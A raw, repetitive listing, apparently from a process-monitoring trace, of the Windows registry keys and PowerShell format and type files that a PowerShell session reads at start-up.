WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
